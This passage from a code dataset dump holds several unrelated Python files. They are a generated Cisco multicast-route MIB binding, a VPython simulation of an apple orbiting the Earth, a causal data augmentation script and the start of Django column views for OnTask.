If no IP Multicast heartbeat is configured, this table would be empty\n \t**type**\\: :py:class:`Ciscoipmrouteheartbeattable `\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib, self).__init__()\n self._top_entity = None\n\n self.yang_name = \"CISCO-IPMROUTE-MIB\"\n self.yang_parent_name = \"CISCO-IPMROUTE-MIB\"\n\n self.ciscoipmroute = CiscoIpmrouteMib.Ciscoipmroute()\n self.ciscoipmroute.parent = self\n self._children_name_map[\"ciscoipmroute\"] = \"ciscoIpMRoute\"\n self._children_yang_names.add(\"ciscoIpMRoute\")\n\n self.ciscoipmrouteheartbeattable = CiscoIpmrouteMib.Ciscoipmrouteheartbeattable()\n self.ciscoipmrouteheartbeattable.parent = self\n self._children_name_map[\"ciscoipmrouteheartbeattable\"] = \"ciscoIpMRouteHeartBeatTable\"\n self._children_yang_names.add(\"ciscoIpMRouteHeartBeatTable\")\n\n\n class Ciscoipmroute(Entity):\n \"\"\"\n \n \n .. attribute:: ciscoipmroutenumberofentries\n \n \tMaintains a count of the number of entries in the ipMRouteTable\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib.Ciscoipmroute, self).__init__()\n\n self.yang_name = \"ciscoIpMRoute\"\n self.yang_parent_name = \"CISCO-IPMROUTE-MIB\"\n\n self.ciscoipmroutenumberofentries = YLeaf(YType.uint32, \"ciscoIpMRouteNumberOfEntries\")\n\n def __setattr__(self, name, value):\n self._check_monkey_patching_error(name, value)\n with _handle_type_error():\n if name in self.__dict__ and isinstance(self.__dict__[name], YList):\n raise YPYModelError(\"Attempt to assign value of '{}' to YList ldata. \"\n \"Please use list append or extend method.\"\n .format(value))\n if isinstance(value, Enum.YLeaf):\n value = value.name\n if name in (\"ciscoipmroutenumberofentries\") and name in self.__dict__:\n if isinstance(value, YLeaf):\n self.__dict__[name].set(value.get())\n elif isinstance(value, YLeafList):\n super(CiscoIpmrouteMib.Ciscoipmroute, self).__setattr__(name, value)\n else:\n self.__dict__[name].set(value)\n else:\n if hasattr(value, \"parent\") and name != \"parent\":\n if hasattr(value, \"is_presence_container\") and value.is_presence_container:\n value.parent = self\n elif value.parent is None and value.yang_name in self._children_yang_names:\n value.parent = self\n super(CiscoIpmrouteMib.Ciscoipmroute, self).__setattr__(name, value)\n\n def has_data(self):\n return self.ciscoipmroutenumberofentries.is_set\n\n def has_operation(self):\n return (\n self.yfilter != YFilter.not_set or\n self.ciscoipmroutenumberofentries.yfilter != YFilter.not_set)\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"ciscoIpMRoute\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (ancestor is None):\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB/%s\" % self.get_segment_path()\n else:\n path_buffer = _get_relative_entity_path(self, ancestor, path_buffer)\n\n leaf_name_data = LeafDataList()\n if (self.ciscoipmroutenumberofentries.is_set or self.ciscoipmroutenumberofentries.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmroutenumberofentries.get_name_leafdata())\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n 
return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRouteNumberOfEntries\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n if(value_path == \"ciscoIpMRouteNumberOfEntries\"):\n self.ciscoipmroutenumberofentries = value\n self.ciscoipmroutenumberofentries.value_namespace = name_space\n self.ciscoipmroutenumberofentries.value_namespace_prefix = name_space_prefix\n\n\n class Ciscoipmrouteheartbeattable(Entity):\n \"\"\"\n The (conceptual) table listing sets of IP Multicast\n heartbeat parameters. If no IP Multicast heartbeat is\n configured, this table would be empty.\n \n .. attribute:: ciscoipmrouteheartbeatentry\n \n \tAn entry (conceptual row) representing a set of IP Multicast heartbeat parameters\n \t**type**\\: list of :py:class:`Ciscoipmrouteheartbeatentry `\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable, self).__init__()\n\n self.yang_name = \"ciscoIpMRouteHeartBeatTable\"\n self.yang_parent_name = \"CISCO-IPMROUTE-MIB\"\n\n self.ciscoipmrouteheartbeatentry = YList(self)\n\n def __setattr__(self, name, value):\n self._check_monkey_patching_error(name, value)\n with _handle_type_error():\n if name in self.__dict__ and isinstance(self.__dict__[name], YList):\n raise YPYModelError(\"Attempt to assign value of '{}' to YList ldata. \"\n \"Please use list append or extend method.\"\n .format(value))\n if isinstance(value, Enum.YLeaf):\n value = value.name\n if name in () and name in self.__dict__:\n if isinstance(value, YLeaf):\n self.__dict__[name].set(value.get())\n elif isinstance(value, YLeafList):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable, self).__setattr__(name, value)\n else:\n self.__dict__[name].set(value)\n else:\n if hasattr(value, \"parent\") and name != \"parent\":\n if hasattr(value, \"is_presence_container\") and value.is_presence_container:\n value.parent = self\n elif value.parent is None and value.yang_name in self._children_yang_names:\n value.parent = self\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable, self).__setattr__(name, value)\n\n\n class Ciscoipmrouteheartbeatentry(Entity):\n \"\"\"\n An entry (conceptual row) representing a set of IP\n Multicast heartbeat parameters.\n \n .. attribute:: ciscoipmrouteheartbeatgroupaddr \n \n \tMulticast group address used to receive heartbeat packets\n \t**type**\\: str\n \n \t**pattern:** (([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])\\\\.){3}([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])(%[\\\\p{N}\\\\p{L}]+)?\n \n .. attribute:: ciscoipmrouteheartbeatalerttime\n \n \tThe value of sysUpTime on the most recent occasion at which a missing IP multicast heartbeat condition occured for the group address specified in this entry. If no such condition have occurred since the last re\\-initialization of the local management subsystem, then this object contains a zero value\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: ciscoipmrouteheartbeatcount\n \n \tNumber of time intervals where multicast packets were received in the last ciscoIpMRouteHeartBeatWindowSize intervals\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: ciscoipmrouteheartbeatinterval\n \n \tNumber of seconds in which a Cisco multicast router expects a valid heartBeat packet from a source. 
This value must be a multiple of 10\n \t**type**\\: int\n \n \t**range:** 10..3600\n \n \t**units**\\: seconds\n \n .. attribute:: ciscoipmrouteheartbeatminimum\n \n \tThe minimal number of heartbeat packets expected in the last ciscoIpMRouteHeartBeatWindowSize intervals. If ciscoIpMRouteHeartBeatCount falls below this value, an SNMP trap/notification, if configured, will be sent to the NMS\n \t**type**\\: int\n \n \t**range:** 1..100\n \n .. attribute:: ciscoipmrouteheartbeatsourceaddr\n \n \tSource address of the last multicast heartbeat packet received\n \t**type**\\: str\n \n \t**pattern:** (([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])\\\\.){3}([0\\-9]\\|[1\\-9][0\\-9]\\|1[0\\-9][0\\-9]\\|2[0\\-4][0\\-9]\\|25[0\\-5])(%[\\\\p{N}\\\\p{L}]+)?\n \n .. attribute:: ciscoipmrouteheartbeatstatus\n \n \tThis object is used to create a new row or delete an existing row in this table\n \t**type**\\: :py:class:`Rowstatus `\n \n .. attribute:: ciscoipmrouteheartbeatwindowsize\n \n \tNumber of ciscoIpMRouteHeartBeatInterval intervals a Cisco multicast router waits before checking if expected number of heartbeat packets are received or not\n \t**type**\\: int\n \n \t**range:** 1..100\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry, self).__init__()\n\n self.yang_name = \"ciscoIpMRouteHeartBeatEntry\"\n self.yang_parent_name = \"ciscoIpMRouteHeartBeatTable\"\n\n self.ciscoipmrouteheartbeatgroupaddr = YLeaf(YType.str, \"ciscoIpMRouteHeartBeatGroupAddr\")\n\n self.ciscoipmrouteheartbeatalerttime = YLeaf(YType.uint32, \"ciscoIpMRouteHeartBeatAlertTime\")\n\n self.ciscoipmrouteheartbeatcount = YLeaf(YType.uint32, \"ciscoIpMRouteHeartBeatCount\")\n\n self.ciscoipmrouteheartbeatinterval = YLeaf(YType.int32, \"ciscoIpMRouteHeartBeatInterval\")\n\n self.ciscoipmrouteheartbeatminimum = YLeaf(YType.int32, \"ciscoIpMRouteHeartBeatMinimum\")\n\n self.ciscoipmrouteheartbeatsourceaddr = YLeaf(YType.str, \"ciscoIpMRouteHeartBeatSourceAddr\")\n\n self.ciscoipmrouteheartbeatstatus = YLeaf(YType.enumeration, \"ciscoIpMRouteHeartBeatStatus\")\n\n self.ciscoipmrouteheartbeatwindowsize = YLeaf(YType.int32, \"ciscoIpMRouteHeartBeatWindowSize\")\n\n def __setattr__(self, name, value):\n self._check_monkey_patching_error(name, value)\n with _handle_type_error():\n if name in self.__dict__ and isinstance(self.__dict__[name], YList):\n raise YPYModelError(\"Attempt to assign value of '{}' to YList ldata. 
\"\n \"Please use list append or extend method.\"\n .format(value))\n if isinstance(value, Enum.YLeaf):\n value = value.name\n if name in (\"ciscoipmrouteheartbeatgroupaddr\",\n \"ciscoipmrouteheartbeatalerttime\",\n \"ciscoipmrouteheartbeatcount\",\n \"ciscoipmrouteheartbeatinterval\",\n \"ciscoipmrouteheartbeatminimum\",\n \"ciscoipmrouteheartbeatsourceaddr\",\n \"ciscoipmrouteheartbeatstatus\",\n \"ciscoipmrouteheartbeatwindowsize\") and name in self.__dict__:\n if isinstance(value, YLeaf):\n self.__dict__[name].set(value.get())\n elif isinstance(value, YLeafList):\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry, self).__setattr__(name, value)\n else:\n self.__dict__[name].set(value)\n else:\n if hasattr(value, \"parent\") and name != \"parent\":\n if hasattr(value, \"is_presence_container\") and value.is_presence_container:\n value.parent = self\n elif value.parent is None and value.yang_name in self._children_yang_names:\n value.parent = self\n super(CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry, self).__setattr__(name, value)\n\n def has_data(self):\n return (\n self.ciscoipmrouteheartbeatgroupaddr.is_set or\n self.ciscoipmrouteheartbeatalerttime.is_set or\n self.ciscoipmrouteheartbeatcount.is_set or\n self.ciscoipmrouteheartbeatinterval.is_set or\n self.ciscoipmrouteheartbeatminimum.is_set or\n self.ciscoipmrouteheartbeatsourceaddr.is_set or\n self.ciscoipmrouteheartbeatstatus.is_set or\n self.ciscoipmrouteheartbeatwindowsize.is_set)\n\n def has_operation(self):\n return (\n self.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatgroupaddr.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatalerttime.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatcount.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatinterval.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatminimum.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatsourceaddr.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatstatus.yfilter != YFilter.not_set or\n self.ciscoipmrouteheartbeatwindowsize.yfilter != YFilter.not_set)\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"ciscoIpMRouteHeartBeatEntry\" + \"[ciscoIpMRouteHeartBeatGroupAddr='\" + self.ciscoipmrouteheartbeatgroupaddr.get() + \"']\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (ancestor is None):\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB/ciscoIpMRouteHeartBeatTable/%s\" % self.get_segment_path()\n else:\n path_buffer = _get_relative_entity_path(self, ancestor, path_buffer)\n\n leaf_name_data = LeafDataList()\n if (self.ciscoipmrouteheartbeatgroupaddr.is_set or self.ciscoipmrouteheartbeatgroupaddr.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatgroupaddr.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatalerttime.is_set or self.ciscoipmrouteheartbeatalerttime.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatalerttime.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatcount.is_set or self.ciscoipmrouteheartbeatcount.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatcount.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatinterval.is_set or self.ciscoipmrouteheartbeatinterval.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatinterval.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatminimum.is_set or 
self.ciscoipmrouteheartbeatminimum.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatminimum.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatsourceaddr.is_set or self.ciscoipmrouteheartbeatsourceaddr.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatsourceaddr.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatstatus.is_set or self.ciscoipmrouteheartbeatstatus.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatstatus.get_name_leafdata())\n if (self.ciscoipmrouteheartbeatwindowsize.is_set or self.ciscoipmrouteheartbeatwindowsize.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmrouteheartbeatwindowsize.get_name_leafdata())\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRouteHeartBeatGroupAddr\" or name == \"ciscoIpMRouteHeartBeatAlertTime\" or name == \"ciscoIpMRouteHeartBeatCount\" or name == \"ciscoIpMRouteHeartBeatInterval\" or name == \"ciscoIpMRouteHeartBeatMinimum\" or name == \"ciscoIpMRouteHeartBeatSourceAddr\" or name == \"ciscoIpMRouteHeartBeatStatus\" or name == \"ciscoIpMRouteHeartBeatWindowSize\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n if(value_path == \"ciscoIpMRouteHeartBeatGroupAddr\"):\n self.ciscoipmrouteheartbeatgroupaddr = value\n self.ciscoipmrouteheartbeatgroupaddr.value_namespace = name_space\n self.ciscoipmrouteheartbeatgroupaddr.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatAlertTime\"):\n self.ciscoipmrouteheartbeatalerttime = value\n self.ciscoipmrouteheartbeatalerttime.value_namespace = name_space\n self.ciscoipmrouteheartbeatalerttime.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatCount\"):\n self.ciscoipmrouteheartbeatcount = value\n self.ciscoipmrouteheartbeatcount.value_namespace = name_space\n self.ciscoipmrouteheartbeatcount.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatInterval\"):\n self.ciscoipmrouteheartbeatinterval = value\n self.ciscoipmrouteheartbeatinterval.value_namespace = name_space\n self.ciscoipmrouteheartbeatinterval.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatMinimum\"):\n self.ciscoipmrouteheartbeatminimum = value\n self.ciscoipmrouteheartbeatminimum.value_namespace = name_space\n self.ciscoipmrouteheartbeatminimum.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatSourceAddr\"):\n self.ciscoipmrouteheartbeatsourceaddr = value\n self.ciscoipmrouteheartbeatsourceaddr.value_namespace = name_space\n self.ciscoipmrouteheartbeatsourceaddr.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatStatus\"):\n self.ciscoipmrouteheartbeatstatus = value\n self.ciscoipmrouteheartbeatstatus.value_namespace = name_space\n self.ciscoipmrouteheartbeatstatus.value_namespace_prefix = name_space_prefix\n if(value_path == \"ciscoIpMRouteHeartBeatWindowSize\"):\n self.ciscoipmrouteheartbeatwindowsize = value\n self.ciscoipmrouteheartbeatwindowsize.value_namespace = name_space\n self.ciscoipmrouteheartbeatwindowsize.value_namespace_prefix = name_space_prefix\n\n def 
has_data(self):\n for c in self.ciscoipmrouteheartbeatentry:\n if (c.has_data()):\n return True\n return False\n\n def has_operation(self):\n for c in self.ciscoipmrouteheartbeatentry:\n if (c.has_operation()):\n return True\n return self.yfilter != YFilter.not_set\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"ciscoIpMRouteHeartBeatTable\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (ancestor is None):\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB/%s\" % self.get_segment_path()\n else:\n path_buffer = _get_relative_entity_path(self, ancestor, path_buffer)\n\n leaf_name_data = LeafDataList()\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n if (child_yang_name == \"ciscoIpMRouteHeartBeatEntry\"):\n for c in self.ciscoipmrouteheartbeatentry:\n segment = c.get_segment_path()\n if (segment_path == segment):\n return c\n c = CiscoIpmrouteMib.Ciscoipmrouteheartbeattable.Ciscoipmrouteheartbeatentry()\n c.parent = self\n local_reference_key = \"ydk::seg::%s\" % segment_path\n self._local_refs[local_reference_key] = c\n self.ciscoipmrouteheartbeatentry.append(c)\n return c\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRouteHeartBeatEntry\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n pass\n\n def has_data(self):\n return (\n (self.ciscoipmroute is not None and self.ciscoipmroute.has_data()) or\n (self.ciscoipmrouteheartbeattable is not None and self.ciscoipmrouteheartbeattable.has_data()))\n\n def has_operation(self):\n return (\n self.yfilter != YFilter.not_set or\n (self.ciscoipmroute is not None and self.ciscoipmroute.has_operation()) or\n (self.ciscoipmrouteheartbeattable is not None and self.ciscoipmrouteheartbeattable.has_operation()))\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (not ancestor is None):\n raise YPYModelError(\"ancestor has to be None for top-level node\")\n\n path_buffer = self.get_segment_path()\n leaf_name_data = LeafDataList()\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n if (child_yang_name == \"ciscoIpMRoute\"):\n if (self.ciscoipmroute is None):\n self.ciscoipmroute = CiscoIpmrouteMib.Ciscoipmroute()\n self.ciscoipmroute.parent = self\n self._children_name_map[\"ciscoipmroute\"] = \"ciscoIpMRoute\"\n return self.ciscoipmroute\n\n if (child_yang_name == \"ciscoIpMRouteHeartBeatTable\"):\n if (self.ciscoipmrouteheartbeattable is None):\n self.ciscoipmrouteheartbeattable = CiscoIpmrouteMib.Ciscoipmrouteheartbeattable()\n self.ciscoipmrouteheartbeattable.parent = self\n self._children_name_map[\"ciscoipmrouteheartbeattable\"] = \"ciscoIpMRouteHeartBeatTable\"\n return self.ciscoipmrouteheartbeattable\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRoute\" or name == \"ciscoIpMRouteHeartBeatTable\"):\n return True\n return False\n\n def set_value(self, value_path, 
value, name_space, name_space_prefix):\n pass\n\n def clone_ptr(self):\n self._top_entity = CiscoIpmrouteMib()\n return self._top_entity\n\n","repo_name":"juancsosap/yangtraining","sub_path":"tools/ydk-py-master/cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IPMROUTE_MIB.py","file_name":"CISCO_IPMROUTE_MIB.py","file_ext":"py","file_size_in_byte":26626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19014570064","text":"from vpython import *\n#GlowScript 3.0 VPython\n\n# 화면 설정\nscene.range = 20000\n\n# 크기 조정을 위한 변수\nsf = 10000\nsf_e = 1\n\n# 지구, 사과 만들기\nearth = sphere(pos = vec(0,-6400000,0), radius = sf_e*6400000, color = color.blue) \napple = sphere(pos = vec(0,1000,0), radius = sf*0.1, color = color.red, make_trail = True) \n\n# 물리 성질 & 상수 초기화\napple.m = 0.1 #사과 질량 ##kg\napple.v = vec(7900,0,0) #사과 초기 속도 ##m/s\nearth.m = 5.98e24 #지구 질량 \nearth.v = vec(0,0,0) #지구 초기 속도\nG = 6.67e-11 #중력상수 ##N*m**2/kg**2\n\n# 시간 설정\nt = 0 ##s\ndt = 1 ##s\n\n# 시뮬레이션 루프\nwhile t < 10000:\n rate(10000)\n \n # 만유인력\n F = -G*earth.m*apple.m/mag(earth.pos-apple.pos)**2*norm(earth.pos-apple.pos)\n \n # 뉴턴 제 3법칙 적용 (작용 반작용)\n earth.force = F\n apple.force = -F\n\n # 속도, 위치 업데이트\n apple.v = apple.v + apple.force/apple.m*dt\n earth.v = earth.v + earth.force/earth.m*dt\n apple.pos = apple.pos + apple.v*dt\n earth.pos = earth.pos + earth.v*dt\n \n print(t/3600,\":\",mag(apple.pos-earth.pos)) #출력\n\n scene.center = apple.pos #화면 업데이트\n\n # 시간 업데이트\n t += dt\n","repo_name":"zoonature/Physics_programmed_by_python","sub_path":"ex3-2-2-지구중력과 사과의 궤도 운동.py","file_name":"ex3-2-2-지구중력과 사과의 궤도 운동.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24761451162","text":"import yaml\nimport pandas as pd\nimport numpy as np\nfrom copy import deepcopy\nfrom typing import Tuple\nimport argparse\nfrom ananke.graphs import ADMG\nfrom pathlib import Path\nfrom causal_data_augmentation.causal_data_augmentation.api import (\n AugmenterConfig, EagerCausalDataAugmentation, FullAugmentKind\n)\nfrom causal_data_augmentation.api_support.experiments.logging.pickler import Pickler\nimport causal_data_augmentation.causal_data_augmentation.api_support.method_config as method_config_module\n\n\n\ndef apply_augmenter(augmenter_config: AugmenterConfig, \n method: EagerCausalDataAugmentation, \n data: pd.DataFrame, \n admg: ADMG) -> Tuple[pd.DataFrame, np.ndarray]:\n \"\"\"Perform the augmentation using the augmenter configured by ``augmenter_config``.\n\n Parameters:\n augmenter_config : Method configuration.\n method : Instantiated method object.\n data : Data to be augmented.\n admg : ADMG to be used for the augmentation.\n\n Returns:\n Tuple containing\n\n - augmented_data : The augmented data DataFrame.\n - aug_weights : The instance weights corresponding to the augmented data.\n \"\"\"\n if isinstance(augmenter_config, FullAugmentKind):\n augmented_data, aug_weights = method.augment(data, admg)\n aug_weights = aug_weights.flatten()\n else:\n raise NotImplementedError()\n\n return augmented_data, aug_weights\n\n\ndef _augment(data: pd.DataFrame, \n graph, \n augmenter_config: AugmenterConfig, \n data_cache_base_path, \n data_cache_name) -> Tuple[pd.DataFrame, np.ndarray]:\n \"\"\"Instantiate the method and perform the data augmentation.\n\n Parameters:\n data : Data to be augmented.\n graph : ADMG to be used for the augmentation.\n augmenter_config : Method configuration.\n 
data_cache_base_path: The path to the folder to save the trained model and the augmented data\n data_cache_name: The base name that the saved files should follow (it contains the experiment settings)\n\n Returns:\n Tuple containing\n\n - augmented_data : The augmented data DataFrame.\n - aug_weights : The instance weights corresponding to the augmented data.\n \"\"\"\n vertices, di_edges, bi_edges = graph\n admg = ADMG(vertices, di_edges=di_edges, bi_edges=bi_edges)\n method = EagerCausalDataAugmentation(data_cache_base_path, data_cache_name, augmenter_config)\n\n # Augment\n augmented_data, aug_weights = apply_augmenter(\n augmenter_config, method, data, admg)\n return augmented_data, aug_weights\n\n\ndef run_method(data: pd.DataFrame, \n graph,\n predicted_var_name: str,\n predictor_model,\n augmenter_config: AugmenterConfig,\n aug_coeff,\n fit_to_aug_only,\n data_cache_base_path, \n data_cache_name):\n \"\"\"Run the method and record the results.\n\n Parameters:\n data: The data to be augmented.\n graph: The ADMG object used for performing the augmentation.\n predicted_var_name: The name of the predicted variable.\n predictor_model: Trainable predictor model to be trained on the augmented data. Should implement ``fit()`` and ``predict()``.\n augmenter_config: AugmenterConfig,\n aug_coeff: Regularization term in for the augmented data\n fit_to_aug_only: Whether or not to fit the models only to the augmented data\n data_cache_base_path: The path to the folder to save the trained model and the augmented data\n data_cache_name: The base name the saved files should follow (it contains the experiment settings)\n \n Returns:\n List of trained models\n \"\"\"\n # Augment data\n augmented_data, aug_weights = _augment(data, graph, augmenter_config, data_cache_base_path, data_cache_name)\n \n # Save augmented data and weights \n augmented_data_to_save_df = augmented_data.copy()\n augmented_data_to_save_df['aug_weights'] = aug_weights\n _augmented_data_pickler = Pickler(data_cache_name + \"_augmented\", data_cache_base_path)\n _augmented_data_pickler.save(augmented_data_to_save_df)\n \n # self._measure_augmentation(augmented_data, aug_weights, data))\n\n model_list = []\n predictor = deepcopy(predictor_model)\n for aug_coeff in aug_coeff:\n # Perform training\n if fit_to_aug_only:\n augmented_data = None\n orig_weights = np.zeros(len(data))\n else:\n X = np.array(data.drop(predicted_var_name, axis=1))\n Y = np.array(data[[predicted_var_name]])\n aug_X = np.array(augmented_data.drop(predicted_var_name, axis=1))\n aug_Y = np.array(augmented_data[[predicted_var_name]])\n orig_weights = np.ones(len(data)) / len(data)\n if aug_weights.size > 0:\n orig_weights *= 1 - aug_coeff\n aug_weights *= aug_coeff\n\n orig_weights *= len(data)\n aug_weights *= len(data)\n\n predictor.fit(data, augmented_data, orig_weights, aug_weights)\n model_list.append(predictor.model)\n return model_list\n\ndef main(df: pd.DataFrame, graph, augment_config):\n data_cache_base_path = ''\n data_cache_base_path = Path(data_cache_base_path)\n data_cache_name = 'simu_test'\n\n # Intermediate arguments\n augmenter_config_name = 'FullAugment'\n AugmenterConfigClass = getattr(method_config_module, augmenter_config_name)\n augmenter_config_ok = AugmenterConfigClass(**augmenter_config)\n method = EagerCausalDataAugmentation(data_cache_base_path,\n data_cache_name,\n augmenter_config_ok)\n\n vertices, di_edges, bi_edges = graph\n admg = ADMG(vertices, di_edges=di_edges, bi_edges=bi_edges)\n dag_image = admg.draw()\n\n aug_data, aug_weights 
= _augment(df, \n                                    graph,\n                                    augmenter_config_ok, \n                                    data_cache_base_path, \n                                    data_cache_name)\n    aug_data_to_print = aug_data.copy()\n    aug_data_to_print['weight'] = aug_weights*df.shape[0]\n    print(aug_data_to_print)\n    print(aug_data_to_print['weight'].sum()) \n    return aug_data_to_print, dag_image\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--config\", required=True, help=\"yaml config file\")\n    parser.add_argument(\"--table\", required=True, help=\"csv data file\")\n    args = parser.parse_args()\n    result_dir = Path('./result')\n\n    with open(args.config) as file:\n        config = yaml.safe_load(file)\n    augmenter_config = config['augmenter_config']\n    admg_config = config['admg_config']\n    vertices = admg_config['vertices']\n    di_edges = admg_config['di_edges']\n    bi_edges = admg_config['bi_edges']\n    predicted_var_name = admg_config['predicted_var_name']\n\n    data = pd.read_csv(args.table) \n\n    aug_data, dag_image = main(data, (vertices, di_edges, bi_edges), augmenter_config)\n    aug_data.to_csv(result_dir / f'augmented_{args.table}', index=None)\n    dag_image.render(result_dir / f'ADMG_{args.table}')","repo_name":"macostrail/causalDA","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"73694531024","text":"\"\"\"Views for create/rename/update/delete columns.\"\"\"\n\nfrom django import http\nfrom django.contrib import messages\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views import generic\n\nfrom ontask import OnTaskServiceException, models\nfrom ontask.column import forms, services\nfrom ontask.core import (\n    ActionView, ColumnView, JSONFormResponseMixin, UserIsInstructor,\n    ajax_required)\n\n# These are the column operands offered through the GUI. They have immediate\n# translations onto Pandas operators over dataframes. 
